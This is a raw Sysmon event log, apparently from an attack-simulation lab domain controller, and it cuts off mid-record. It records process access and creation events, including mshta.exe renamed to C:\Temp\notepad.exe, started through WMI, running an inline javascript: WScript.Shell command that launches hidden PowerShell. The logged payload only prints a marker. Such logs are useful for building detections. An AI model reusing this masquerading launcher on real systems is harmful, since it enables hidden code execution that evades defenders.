16:03:35.734{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000029594Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.687{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rq1skalu.vfc.ps12021-01-20 16:03:35.687 10341000x800000000000000029593Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.671{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029592Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.640{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BF06-00000000A301}5556C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029591Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.640{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BF06-00000000A301}5556C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029590Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.624{7901BC46-5457-6008-BF06-00000000A301}55564660C:\Windows\system32\conhost.exe{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029589Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.624{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5457-6008-BF06-00000000A301}5556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029588Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.624{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029587Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.624{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029586Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.624{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029585Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.624{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029584Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.624{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029583Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.609{7901BC46-5457-6008-BD06-00000000A301}63328088C:\Temp\notepad.exe{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029582Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.624{7901BC46-5457-6008-BE06-00000000A301}1228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 709e55a1-0ea3-4b31-91f6-147a690f20f4; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe"C:\Temp\notepad.exe" "javascript:a=new ActiveXObject("WScript.Shell");a.Run("powershell.exe%20-nop%20-Command%20Write-Host%20709e55a1-0ea3-4b31-91f6-147a690f20f4;%20Start-Sleep%20-Seconds%202;%20exit",0,true);close();" 10341000x800000000000000029581Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.593{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029580Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.593{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029579Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.593{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029578Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.577{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029577Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.577{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029576Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.562{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029575Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.562{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029574Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.546{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029573Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.546{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029572Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.546{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029571Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.546{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029570Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.546{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029569Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.546{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029568Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.546{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000029567Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.553{7901BC46-5457-6008-BD06-00000000A301}6332C:\Temp\notepad.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Temp\notepad.exe" "javascript:a=new ActiveXObject("WScript.Shell");a.Run("powershell.exe%%20-nop%%20-Command%%20Write-Host%%20709e55a1-0ea3-4b31-91f6-147a690f20f4;%%20Start-Sleep%%20-Seconds%%202;%%20exit",0,true);close();"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5457-6008-BC06-00000000A301}8012C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000029566Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.531{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029565Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 